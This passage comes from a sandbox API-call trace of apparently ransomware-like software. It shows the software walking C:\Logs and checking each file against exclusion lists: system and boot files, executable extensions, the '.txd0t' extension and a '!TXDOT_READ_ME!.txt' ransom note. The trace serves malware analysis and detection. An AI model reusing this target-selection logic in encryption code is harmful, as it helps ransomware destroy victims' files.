psz2="ntuser.dat") returned -1 [0071.869] StrCmpIW (psz1="Microsoft-Windows-AppXDeployment%4Operational.evtx", psz2="ntldr") returned -1 [0071.869] StrCmpIW (psz1="Microsoft-Windows-AppXDeployment%4Operational.evtx", psz2="ntdetect.com") returned -1 [0071.869] StrCmpIW (psz1="Microsoft-Windows-AppXDeployment%4Operational.evtx", psz2="bootfont.bin") returned 1 [0071.869] StrCmpIW (psz1="Microsoft-Windows-AppXDeployment%4Operational.evtx", psz2="!TXDOT_READ_ME!.txt") returned 1 [0071.869] PathFindExtensionW (pszPath="Microsoft-Windows-AppXDeployment%4Operational.evtx") returned=".evtx" [0071.869] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".evtx") returned 0x0 [0071.869] FileTimeToSystemTime (in: lpFileTime=0x552f9ac, lpSystemTime=0x552f998 | out: lpSystemTime=0x552f998) returned 1 [0071.869] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f998, lpLocalTime=0x552f968 | out: lpLocalTime=0x552f968) returned 1 [0071.869] FileTimeToSystemTime (in: lpFileTime=0x552f9b4, lpSystemTime=0x552f978 | out: lpSystemTime=0x552f978) returned 1 [0071.869] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f978, lpLocalTime=0x552f988 | out: lpLocalTime=0x552f988) returned 1 [0071.869] FileTimeToSystemTime (in: lpFileTime=0x552f9bc, lpSystemTime=0x552f940 | out: lpSystemTime=0x552f940) returned 1 [0071.869] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f940, lpLocalTime=0x552f930 | out: lpLocalTime=0x552f930) returned 1 [0071.869] FindNextFileW (in: hFindFile=0xec2630, lpFindFileData=0x552f9a8 | out: lpFindFileData=0x552f9a8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5af3554f, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0x5af3554f, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1df92a8, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x211000, dwReserved0=0x4c0e48, dwReserved1=0x0, cFileName="Microsoft-Windows-AppXDeploymentServer%4Operational.evtx", cAlternateFileName="MIA24C~1.EVT")) returned 1 [0071.869] StrCmpW (psz1="Microsoft-Windows-AppXDeploymentServer%4Operational.evtx", psz2=".") returned 1 [0071.869] StrCmpW (psz1="Microsoft-Windows-AppXDeploymentServer%4Operational.evtx", psz2="..") returned 1 [0071.869] StrCpyNW (in: psz1=0xecab68, psz2="C:\\Logs", cchMax=1040 | out: psz1="C:\\Logs") returned="C:\\Logs" [0071.869] StrNCatW (in: psz1="C:\\Logs", psz2="\\", cchMax=1040 | out: psz1="C:\\Logs\\") returned="C:\\Logs\\" [0071.869] StrNCatW (in: psz1="C:\\Logs\\", psz2="Microsoft-Windows-AppXDeploymentServer%4Operational.evtx", cchMax=1040 | out: psz1="C:\\Logs\\Microsoft-Windows-AppXDeploymentServer%4Operational.evtx") returned="C:\\Logs\\Microsoft-Windows-AppXDeploymentServer%4Operational.evtx" [0071.869] PathFindExtensionW (pszPath="Microsoft-Windows-AppXDeploymentServer%4Operational.evtx") returned=".evtx" [0071.870] StrCmpW (psz1=".evtx", psz2=".txd0t") returned -1 [0071.870] StrCmpIW (psz1="Microsoft-Windows-AppXDeploymentServer%4Operational.evtx", psz2="bootsect.bak") returned 1 [0071.870] StrCmpIW (psz1="Microsoft-Windows-AppXDeploymentServer%4Operational.evtx", psz2="iconcache.db") returned 1 [0071.871] StrCmpIW (psz1="Microsoft-Windows-AppXDeploymentServer%4Operational.evtx", psz2="thumbs.db") returned -1 [0071.871] StrCmpIW (psz1="Microsoft-Windows-AppXDeploymentServer%4Operational.evtx", psz2=" ransomware ") returned 1 [0071.871] StrCmpIW (psz1="Microsoft-Windows-AppXDeploymentServer%4Operational.evtx", psz2=" ransom ") returned 1 [0071.871] StrCmpIW (psz1="Microsoft-Windows-AppXDeploymentServer%4Operational.evtx", psz2="debug.txt") returned 1 [0071.871] StrCmpIW (psz1="Microsoft-Windows-AppXDeploymentServer%4Operational.evtx", psz2="boot.ini") returned 1 [0071.871] StrCmpIW (psz1="Microsoft-Windows-AppXDeploymentServer%4Operational.evtx", psz2="desktop.ini") returned 1 [0071.871] StrCmpIW (psz1="Microsoft-Windows-AppXDeploymentServer%4Operational.evtx", psz2="autorun.inf") returned 1 [0071.871] StrCmpIW (psz1="Microsoft-Windows-AppXDeploymentServer%4Operational.evtx", psz2="ntuser.dat") returned -1 [0071.871] StrCmpIW (psz1="Microsoft-Windows-AppXDeploymentServer%4Operational.evtx", psz2="ntldr") returned -1 [0071.871] StrCmpIW (psz1="Microsoft-Windows-AppXDeploymentServer%4Operational.evtx", psz2="ntdetect.com") returned -1 [0071.871] StrCmpIW (psz1="Microsoft-Windows-AppXDeploymentServer%4Operational.evtx", psz2="bootfont.bin") returned 1 [0071.871] StrCmpIW (psz1="Microsoft-Windows-AppXDeploymentServer%4Operational.evtx", psz2="!TXDOT_READ_ME!.txt") returned 1 [0071.871] PathFindExtensionW (pszPath="Microsoft-Windows-AppXDeploymentServer%4Operational.evtx") returned=".evtx" [0071.871] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".evtx") returned 0x0 [0071.871] FileTimeToSystemTime (in: lpFileTime=0x552f9ac, lpSystemTime=0x552f998 | out: lpSystemTime=0x552f998) returned 1 [0071.871] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f998, lpLocalTime=0x552f968 | out: lpLocalTime=0x552f968) returned 1 [0071.871] FileTimeToSystemTime (in: lpFileTime=0x552f9b4, lpSystemTime=0x552f978 | out: lpSystemTime=0x552f978) returned 1 [0071.871] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f978, lpLocalTime=0x552f988 | out: lpLocalTime=0x552f988) returned 1 [0071.871] FileTimeToSystemTime (in: lpFileTime=0x552f9bc, lpSystemTime=0x552f940 | out: lpSystemTime=0x552f940) returned 1 [0071.871] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f940, lpLocalTime=0x552f930 | out: lpLocalTime=0x552f930) returned 1 [0071.871] FindNextFileW (in: hFindFile=0xec2630, lpFindFileData=0x552f9a8 | out: lpFindFileData=0x552f9a8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5af3554f, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0x5af3554f, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0x95ae023d, ftLastWriteTime.dwHighDateTime=0x1d1a04e, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x4c0e48, dwReserved1=0x0, cFileName="Microsoft-Windows-AppXDeploymentServer%4Restricted.evtx", cAlternateFileName="MIDBEC~1.EVT")) returned 1 [0071.871] StrCmpW (psz1="Microsoft-Windows-AppXDeploymentServer%4Restricted.evtx", psz2=".") returned 1 [0071.871] StrCmpW (psz1="Microsoft-Windows-AppXDeploymentServer%4Restricted.evtx", psz2="..") returned 1 [0071.871] StrCpyNW (in: psz1=0xecab68, psz2="C:\\Logs", cchMax=1040 | out: psz1="C:\\Logs") returned="C:\\Logs" [0071.871] StrNCatW (in: psz1="C:\\Logs", psz2="\\", cchMax=1040 | out: psz1="C:\\Logs\\") returned="C:\\Logs\\" [0071.871] StrNCatW (in: psz1="C:\\Logs\\", psz2="Microsoft-Windows-AppXDeploymentServer%4Restricted.evtx", cchMax=1040 | out: psz1="C:\\Logs\\Microsoft-Windows-AppXDeploymentServer%4Restricted.evtx") returned="C:\\Logs\\Microsoft-Windows-AppXDeploymentServer%4Restricted.evtx" [0071.871] PathFindExtensionW (pszPath="Microsoft-Windows-AppXDeploymentServer%4Restricted.evtx") returned=".evtx" [0071.871] StrCmpW (psz1=".evtx", psz2=".txd0t") returned -1 [0071.871] StrCmpIW (psz1="Microsoft-Windows-AppXDeploymentServer%4Restricted.evtx", psz2="bootsect.bak") returned 1 [0071.871] StrCmpIW (psz1="Microsoft-Windows-AppXDeploymentServer%4Restricted.evtx", psz2="iconcache.db") returned 1 [0071.871] StrCmpIW (psz1="Microsoft-Windows-AppXDeploymentServer%4Restricted.evtx", psz2="thumbs.db") returned -1 [0071.872] StrCmpIW (psz1="Microsoft-Windows-AppXDeploymentServer%4Restricted.evtx", psz2=" ransomware ") returned 1 [0071.872] StrCmpIW (psz1="Microsoft-Windows-AppXDeploymentServer%4Restricted.evtx", psz2=" ransom ") returned 1 [0071.872] StrCmpIW (psz1="Microsoft-Windows-AppXDeploymentServer%4Restricted.evtx", psz2="debug.txt") returned 1 [0071.872] StrCmpIW (psz1="Microsoft-Windows-AppXDeploymentServer%4Restricted.evtx", psz2="boot.ini") returned 1 [0071.872] StrCmpIW (psz1="Microsoft-Windows-AppXDeploymentServer%4Restricted.evtx", psz2="desktop.ini") returned 1 [0071.872] StrCmpIW (psz1="Microsoft-Windows-AppXDeploymentServer%4Restricted.evtx", psz2="autorun.inf") returned 1 [0071.872] StrCmpIW (psz1="Microsoft-Windows-AppXDeploymentServer%4Restricted.evtx", psz2="ntuser.dat") returned -1 [0071.872] StrCmpIW (psz1="Microsoft-Windows-AppXDeploymentServer%4Restricted.evtx", psz2="ntldr") returned -1 [0071.872] StrCmpIW (psz1="Microsoft-Windows-AppXDeploymentServer%4Restricted.evtx", psz2="ntdetect.com") returned -1 [0071.872] StrCmpIW (psz1="Microsoft-Windows-AppXDeploymentServer%4Restricted.evtx", psz2="bootfont.bin") returned 1 [0071.872] StrCmpIW (psz1="Microsoft-Windows-AppXDeploymentServer%4Restricted.evtx", psz2="!TXDOT_READ_ME!.txt") returned 1 [0071.872] PathFindExtensionW (pszPath="Microsoft-Windows-AppXDeploymentServer%4Restricted.evtx") returned=".evtx" [0071.872] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".evtx") returned 0x0 [0071.872] FileTimeToSystemTime (in: lpFileTime=0x552f9ac, lpSystemTime=0x552f998 | out: lpSystemTime=0x552f998) returned 1 [0071.872] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f998, lpLocalTime=0x552f968 | out: lpLocalTime=0x552f968) returned 1 [0071.872] FileTimeToSystemTime (in: lpFileTime=0x552f9b4, lpSystemTime=0x552f978 | out: lpSystemTime=0x552f978) returned 1 [0071.872] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f978, lpLocalTime=0x552f988 | out: lpLocalTime=0x552f988) returned 1 [0071.872] FileTimeToSystemTime (in: lpFileTime=0x552f9bc, lpSystemTime=0x552f940 | out: lpSystemTime=0x552f940) returned 1 [0071.872] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f940, lpLocalTime=0x552f930 | out: lpLocalTime=0x552f930) returned 1 [0071.872] FindNextFileW (in: hFindFile=0xec2630, lpFindFileData=0x552f9a8 | out: lpFindFileData=0x552f9a8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x85798667, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0x85798667, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0x95ae023d, ftLastWriteTime.dwHighDateTime=0x1d1a04e, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x4c0e48, dwReserved1=0x0, cFileName="Microsoft-Windows-AppxPackaging%4Operational.evtx", cAlternateFileName="MI54F1~1.EVT")) returned 1 [0071.872] StrCmpW (psz1="Microsoft-Windows-AppxPackaging%4Operational.evtx", psz2=".") returned 1 [0071.872] StrCmpW (psz1="Microsoft-Windows-AppxPackaging%4Operational.evtx", psz2="..") returned 1 [0071.872] StrCpyNW (in: psz1=0xecab68, psz2="C:\\Logs", cchMax=1040 | out: psz1="C:\\Logs") returned="C:\\Logs" [0071.872] StrNCatW (in: psz1="C:\\Logs", psz2="\\", cchMax=1040 | out: psz1="C:\\Logs\\") returned="C:\\Logs\\" [0071.872] StrNCatW (in: psz1="C:\\Logs\\", psz2="Microsoft-Windows-AppxPackaging%4Operational.evtx", cchMax=1040 | out: psz1="C:\\Logs\\Microsoft-Windows-AppxPackaging%4Operational.evtx") returned="C:\\Logs\\Microsoft-Windows-AppxPackaging%4Operational.evtx" [0071.872] PathFindExtensionW (pszPath="Microsoft-Windows-AppxPackaging%4Operational.evtx") returned=".evtx" [0071.872] StrCmpW (psz1=".evtx", psz2=".txd0t") returned -1 [0071.872] StrCmpIW (psz1="Microsoft-Windows-AppxPackaging%4Operational.evtx", psz2="bootsect.bak") returned 1 [0071.872] StrCmpIW (psz1="Microsoft-Windows-AppxPackaging%4Operational.evtx", psz2="iconcache.db") returned 1 [0071.872] StrCmpIW (psz1="Microsoft-Windows-AppxPackaging%4Operational.evtx", psz2="thumbs.db") returned -1 [0071.873] StrCmpIW (psz1="Microsoft-Windows-AppxPackaging%4Operational.evtx", psz2=" ransomware ") returned 1 [0071.873] StrCmpIW (psz1="Microsoft-Windows-AppxPackaging%4Operational.evtx", psz2=" ransom ") returned 1 [0071.873] StrCmpIW (psz1="Microsoft-Windows-AppxPackaging%4Operational.evtx", psz2="debug.txt") returned 1 [0071.873] StrCmpIW (psz1="Microsoft-Windows-AppxPackaging%4Operational.evtx", psz2="boot.ini") returned 1 [0071.873] StrCmpIW (psz1="Microsoft-Windows-AppxPackaging%4Operational.evtx", psz2="desktop.ini") returned 1 [0071.873] StrCmpIW (psz1="Microsoft-Windows-AppxPackaging%4Operational.evtx", psz2="autorun.inf") returned 1 [0071.873] StrCmpIW (psz1="Microsoft-Windows-AppxPackaging%4Operational.evtx", psz2="ntuser.dat") returned -1 [0071.873] StrCmpIW (psz1="Microsoft-Windows-AppxPackaging%4Operational.evtx", psz2="ntldr") returned -1 [0071.873] StrCmpIW (psz1="Microsoft-Windows-AppxPackaging%4Operational.evtx", psz2="ntdetect.com") returned -1 [0071.873] StrCmpIW (psz1="Microsoft-Windows-AppxPackaging%4Operational.evtx", psz2="bootfont.bin") returned 1 [0071.873] StrCmpIW (psz1="Microsoft-Windows-AppxPackaging%4Operational.evtx", psz2="!TXDOT_READ_ME!.txt") returned 1 [0071.873] PathFindExtensionW (pszPath="Microsoft-Windows-AppxPackaging%4Operational.evtx") returned=".evtx" [0071.873] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".evtx") returned 0x0 [0071.873] FileTimeToSystemTime (in: lpFileTime=0x552f9ac, lpSystemTime=0x552f998 | out: lpSystemTime=0x552f998) returned 1 [0071.873] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f998, lpLocalTime=0x552f968 | out: lpLocalTime=0x552f968) returned 1 [0071.873] FileTimeToSystemTime (in: lpFileTime=0x552f9b4, lpSystemTime=0x552f978 | out: lpSystemTime=0x552f978) returned 1 [0071.873] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f978, lpLocalTime=0x552f988 | out: lpLocalTime=0x552f988) returned 1 [0071.873] FileTimeToSystemTime (in: lpFileTime=0x552f9bc, lpSystemTime=0x552f940 | out: lpSystemTime=0x552f940) returned 1 [0071.873] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f940, lpLocalTime=0x552f930 | out: lpLocalTime=0x552f930) returned 1 [0071.873] FindNextFileW (in: hFindFile=0xec2630, lpFindFileData=0x552f9a8 | out: lpFindFileData=0x552f9a8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd74d25ab, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xd74d25ab, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1df92a8, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x4c0e48, dwReserved1=0x0, cFileName="Microsoft-Windows-BackgroundTaskInfrastructure%4Operational.evtx", cAlternateFileName="MI111F~1.EVT")) returned 1 [0071.873] StrCmpW (psz1="Microsoft-Windows-BackgroundTaskInfrastructure%4Operational.evtx", psz2=".") returned 1 [0071.873] StrCmpW (psz1="Microsoft-Windows-BackgroundTaskInfrastructure%4Operational.evtx", psz2="..") returned 1 [0071.873] StrCpyNW (in: psz1=0xecab68, psz2="C:\\Logs", cchMax=1040 | out: psz1="C:\\Logs") returned="C:\\Logs" [0071.873] StrNCatW (in: psz1="C:\\Logs", psz2="\\", cchMax=1040 | out: psz1="C:\\Logs\\") returned="C:\\Logs\\" [0071.873] StrNCatW (in: psz1="C:\\Logs\\", psz2="Microsoft-Windows-BackgroundTaskInfrastructure%4Operational.evtx", cchMax=1040 | out: psz1="C:\\Logs\\Microsoft-Windows-BackgroundTaskInfrastructure%4Operational.evtx") returned="C:\\Logs\\Microsoft-Windows-BackgroundTaskInfrastructure%4Operational.evtx" [0071.873] PathFindExtensionW (pszPath="Microsoft-Windows-BackgroundTaskInfrastructure%4Operational.evtx") returned=".evtx" [0071.873] StrCmpW (psz1=".evtx", psz2=".txd0t") returned -1 [0071.873] StrCmpIW (psz1="Microsoft-Windows-BackgroundTaskInfrastructure%4Operational.evtx", psz2="bootsect.bak") returned 1 [0071.873] StrCmpIW (psz1="Microsoft-Windows-BackgroundTaskInfrastructure%4Operational.evtx", psz2="iconcache.db") returned 1 [0071.873] StrCmpIW (psz1="Microsoft-Windows-BackgroundTaskInfrastructure%4Operational.evtx", psz2="thumbs.db") returned -1 [0071.873] StrCmpIW (psz1="Microsoft-Windows-BackgroundTaskInfrastructure%4Operational.evtx", psz2=" ransomware ") returned 1 [0071.874] StrCmpIW (psz1="Microsoft-Windows-BackgroundTaskInfrastructure%4Operational.evtx", psz2=" ransom ") returned 1 [0071.874] StrCmpIW (psz1="Microsoft-Windows-BackgroundTaskInfrastructure%4Operational.evtx", psz2="debug.txt") returned 1 [0071.874] StrCmpIW (psz1="Microsoft-Windows-BackgroundTaskInfrastructure%4Operational.evtx", psz2="boot.ini") returned 1 [0071.874] StrCmpIW (psz1="Microsoft-Windows-BackgroundTaskInfrastructure%4Operational.evtx", psz2="desktop.ini") returned 1 [0071.874] StrCmpIW (psz1="Microsoft-Windows-BackgroundTaskInfrastructure%4Operational.evtx", psz2="autorun.inf") returned 1 [0071.874] StrCmpIW (psz1="Microsoft-Windows-BackgroundTaskInfrastructure%4Operational.evtx", psz2="ntuser.dat") returned -1 [0071.874] StrCmpIW (psz1="Microsoft-Windows-BackgroundTaskInfrastructure%4Operational.evtx", psz2="ntldr") returned -1 [0071.874] StrCmpIW (psz1="Microsoft-Windows-BackgroundTaskInfrastructure%4Operational.evtx", psz2="ntdetect.com") returned -1 [0071.874] StrCmpIW (psz1="Microsoft-Windows-BackgroundTaskInfrastructure%4Operational.evtx", psz2="bootfont.bin") returned 1 [0071.874] StrCmpIW (psz1="Microsoft-Windows-BackgroundTaskInfrastructure%4Operational.evtx", psz2="!TXDOT_READ_ME!.txt") returned 1 [0071.874] PathFindExtensionW (pszPath="Microsoft-Windows-BackgroundTaskInfrastructure%4Operational.evtx") returned=".evtx" [0071.874] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".evtx") returned 0x0 [0071.874] FileTimeToSystemTime (in: lpFileTime=0x552f9ac, lpSystemTime=0x552f998 | out: lpSystemTime=0x552f998) returned 1 [0071.874] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f998, lpLocalTime=0x552f968 | out: lpLocalTime=0x552f968) returned 1 [0071.874] FileTimeToSystemTime (in: lpFileTime=0x552f9b4, lpSystemTime=0x552f978 | out: lpSystemTime=0x552f978) returned 1 [0071.874] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f978, lpLocalTime=0x552f988 | out: lpLocalTime=0x552f988) returned 1 [0071.874] FileTimeToSystemTime (in: lpFileTime=0x552f9bc, lpSystemTime=0x552f940 | out: lpSystemTime=0x552f940) returned 1 [0071.874] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f940, lpLocalTime=0x552f930 | out: lpLocalTime=0x552f930) returned 1 [0071.874] FindNextFileW (in: hFindFile=0xec2630, lpFindFileData=0x552f9a8 | out: lpFindFileData=0x552f9a8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe1f96ca4, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xe1f96ca4, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1df92a8, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x4c0e48, dwReserved1=0x0, cFileName="Microsoft-Windows-Bits-Client%4Operational.evtx", cAlternateFileName="MI9465~1.EVT")) returned 1 [0071.874] StrCmpW (psz1="Microsoft-Windows-Bits-Client%4Operational.evtx", psz2=".") returned 1 [0071.874] StrCmpW (psz1="Microsoft-Windows-Bits-Client%4Operational.evtx", psz2="..") returned 1 [0071.874] StrCpyNW (in: psz1=0xecab68, psz2="C:\\Logs", cchMax=1040 | out: psz1="C:\\Logs") returned="C:\\Logs" [0071.874] StrNCatW (in: psz1="C:\\Logs", psz2="\\", cchMax=1040 | out: psz1="C:\\Logs\\") returned="C:\\Logs\\" [0071.874] StrNCatW (in: psz1="C:\\Logs\\", psz2="Microsoft-Windows-Bits-Client%4Operational.evtx", cchMax=1040 | out: psz1="C:\\Logs\\Microsoft-Windows-Bits-Client%4Operational.evtx") returned="C:\\Logs\\Microsoft-Windows-Bits-Client%4Operational.evtx" [0071.874] PathFindExtensionW (pszPath="Microsoft-Windows-Bits-Client%4Operational.evtx") returned=".evtx" [0071.874] StrCmpW (psz1=".evtx", psz2=".txd0t") returned -1 [0071.874] StrCmpIW (psz1="Microsoft-Windows-Bits-Client%4Operational.evtx", psz2="bootsect.bak") returned 1 [0071.875] StrCmpIW (psz1="Microsoft-Windows-Bits-Client%4Operational.evtx", psz2="iconcache.db") returned 1 [0071.875] StrCmpIW (psz1="Microsoft-Windows-Bits-Client%4Operational.evtx", psz2="thumbs.db") returned -1 [0071.875] StrCmpIW (psz1="Microsoft-Windows-Bits-Client%4Operational.evtx", psz2=" ransomware ") returned 1 [0071.875] StrCmpIW (psz1="Microsoft-Windows-Bits-Client%4Operational.evtx", psz2=" ransom ") returned 1 [0071.875] StrCmpIW (psz1="Microsoft-Windows-Bits-Client%4Operational.evtx", psz2="debug.txt") returned 1 [0071.875] StrCmpIW (psz1="Microsoft-Windows-Bits-Client%4Operational.evtx", psz2="boot.ini") returned 1 [0071.875] StrCmpIW (psz1="Microsoft-Windows-Bits-Client%4Operational.evtx", psz2="desktop.ini") returned 1 [0071.875] StrCmpIW (psz1="Microsoft-Windows-Bits-Client%4Operational.evtx", psz2="autorun.inf") returned 1 [0071.875] StrCmpIW (psz1="Microsoft-Windows-Bits-Client%4Operational.evtx", psz2="ntuser.dat") returned -1 [0071.875] StrCmpIW (psz1="Microsoft-Windows-Bits-Client%4Operational.evtx", psz2="ntldr") returned -1 [0071.875] StrCmpIW (psz1="Microsoft-Windows-Bits-Client%4Operational.evtx", psz2="ntdetect.com") returned -1 [0071.875] StrCmpIW (psz1="Microsoft-Windows-Bits-Client%4Operational.evtx", psz2="bootfont.bin") returned 1 [0071.875] StrCmpIW (psz1="Microsoft-Windows-Bits-Client%4Operational.evtx", psz2="!TXDOT_READ_ME!.txt") returned 1 [0071.875] PathFindExtensionW (pszPath="Microsoft-Windows-Bits-Client%4Operational.evtx") returned=".evtx" [0071.875] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".evtx") returned 0x0 [0071.875] FileTimeToSystemTime (in: lpFileTime=0x552f9ac, lpSystemTime=0x552f998 | out: lpSystemTime=0x552f998) returned 1 [0071.875] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f998, lpLocalTime=0x552f968 | out: lpLocalTime=0x552f968) returned 1 [0071.875] FileTimeToSystemTime (in: lpFileTime=0x552f9b4, lpSystemTime=0x552f978 | out: lpSystemTime=0x552f978) returned 1 [0071.875] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f978, lpLocalTime=0x552f988 | out: lpLocalTime=0x552f988) returned 1 [0071.875] FileTimeToSystemTime (in: lpFileTime=0x552f9bc, lpSystemTime=0x552f940 | out: lpSystemTime=0x552f940) returned 1 [0071.875] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f940, lpLocalTime=0x552f930 | out: lpLocalTime=0x552f930) returned 1 [0071.875] FindNextFileW (in: hFindFile=0xec2630, lpFindFileData=0x552f9a8 | out: lpFindFileData=0x552f9a8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8783aa15, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0x8783aa15, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0x95ae023d, ftLastWriteTime.dwHighDateTime=0x1d1a04e, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x4c0e48, dwReserved1=0x0, cFileName="Microsoft-Windows-CodeIntegrity%4Operational.evtx", cAlternateFileName="MI03A7~1.EVT")) returned 1 [0071.876] StrCmpW (psz1="Microsoft-Windows-CodeIntegrity%4Operational.evtx", psz2=".") returned 1 [0071.876] StrCmpW (psz1="Microsoft-Windows-CodeIntegrity%4Operational.evtx", psz2="..") returned 1 [0071.876] StrCpyNW (in: psz1=0xecab68, psz2="C:\\Logs", cchMax=1040 | out: psz1="C:\\Logs") returned="C:\\Logs" [0071.876] StrNCatW (in: psz1="C:\\Logs", psz2="\\", cchMax=1040 | out: psz1="C:\\Logs\\") returned="C:\\Logs\\" [0071.876] StrNCatW (in: psz1="C:\\Logs\\", psz2="Microsoft-Windows-CodeIntegrity%4Operational.evtx", cchMax=1040 | out: psz1="C:\\Logs\\Microsoft-Windows-CodeIntegrity%4Operational.evtx") returned="C:\\Logs\\Microsoft-Windows-CodeIntegrity%4Operational.evtx" [0071.876] PathFindExtensionW (pszPath="Microsoft-Windows-CodeIntegrity%4Operational.evtx") returned=".evtx" [0071.876] StrCmpW (psz1=".evtx", psz2=".txd0t") returned -1 [0071.876] StrCmpIW (psz1="Microsoft-Windows-CodeIntegrity%4Operational.evtx", psz2="bootsect.bak") returned 1 [0071.876] StrCmpIW (psz1="Microsoft-Windows-CodeIntegrity%4Operational.evtx", psz2="iconcache.db") returned 1 [0071.876] StrCmpIW (psz1="Microsoft-Windows-CodeIntegrity%4Operational.evtx", psz2="thumbs.db") returned -1 [0071.876] StrCmpIW (psz1="Microsoft-Windows-CodeIntegrity%4Operational.evtx", psz2=" ransomware ") returned 1 [0071.876] StrCmpIW (psz1="Microsoft-Windows-CodeIntegrity%4Operational.evtx", psz2=" ransom ") returned 1 [0071.876] StrCmpIW (psz1="Microsoft-Windows-CodeIntegrity%4Operational.evtx", psz2="debug.txt") returned 1 [0071.876] StrCmpIW (psz1="Microsoft-Windows-CodeIntegrity%4Operational.evtx", psz2="boot.ini") returned 1 [0071.876] StrCmpIW (psz1="Microsoft-Windows-CodeIntegrity%4Operational.evtx", psz2="desktop.ini") returned 1 [0071.876] StrCmpIW 